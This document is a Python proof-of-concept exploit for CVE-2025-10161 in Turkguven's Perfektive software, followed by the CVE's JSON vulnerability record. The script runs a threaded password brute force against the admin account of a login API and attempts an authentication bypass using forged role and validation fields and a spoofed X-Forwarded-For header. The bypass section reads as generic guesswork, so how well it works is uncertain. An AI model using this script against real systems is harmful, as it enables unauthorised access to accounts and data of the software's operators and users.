CVE-2025-10161

# CVE-2025-10161 PoC - Perfektive Authentication Bypass # This PoC demonstrates the brute force vulnerability in Perfektive login endpoint import requests import sys from concurrent.futures import ThreadPoolExecutor TARGET_URL = "http://target-host/perfektive/api/login" USERNAME = "admin" # Common password list for brute force attack PASSWORDS = [ "password", "admin123", "123456", "password123", "Perfektive2024", "admin@123", "test1234", "welcome" ] def try_login(password): """Attempt login with given credentials""" headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" } data = { "username": USERNAME, "password": password, # Client-side security bypass attempt "client_validation": "passed", "user_role": "admin" # Untrusted input in security decision } try: response = requests.post(TARGET_URL, json=data, headers=headers, timeout=10) if response.status_code == 200: result = response.json() if result.get('success') or result.get('token'): print(f"[+] SUCCESS: Password found: {password}") print(f"[+] Response: {result}") return True else: print(f"[-] Failed: {password}") else: print(f"[!] HTTP {response.status_code}: {password}") except Exception as e: print(f"[!] Error: {e}") return False def exploit_auth_bypass(): """Exploit client-side enforcement weakness""" # Bypass client validation by directly calling API bypass_data = { "username": USERNAME, "password": "any_password", "skip_validation": True, "user_role": "admin", "session_id": "manipulated_session" } headers = { "Content-Type": "application/json", "X-Forwarded-For": "127.0.0.1" # IP spoofing attempt } response = requests.post(TARGET_URL, json=bypass_data, headers=headers) print(f"[*] Auth Bypass Attempt Response: {response.status_code}") print(f"[*] Body: {response.text}") if __name__ == "__main__": print("[*] CVE-2025-10161 Perfektive Exploitation") print("[*] Target:", TARGET_URL) # Test for rate limiting absence (brute force) print("\n[*] Testing brute force vulnerability...") with ThreadPoolExecutor(max_workers=5) as executor: results = list(executor.map(try_login, PASSWORDS)) # Test client-side bypass print("\n[*] Testing client-side security bypass...") exploit_auth_bypass()

{"cve": {"id": "CVE-2025-10161", "sourceIdentifier": "[email protected]", "published": "2025-11-11T13:15:43.593", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Restriction of Excessive Authentication Attempts, Client-Side Enforcement of Server-Side Security, Reliance on Untrusted Inputs in a Security Decision vulnerability in Turkguven Software Technologies Inc. Perfektive allows Brute Force, Authentication Bypass, Functionality Bypass.This issue affects Perfektive: before Version: 12574 Build: 2701."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-307"}, {"lang": "en", "value": "CWE-602"}, {"lang": "en", "value": "CWE-807"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0387", "source": "[email protected]"}]}}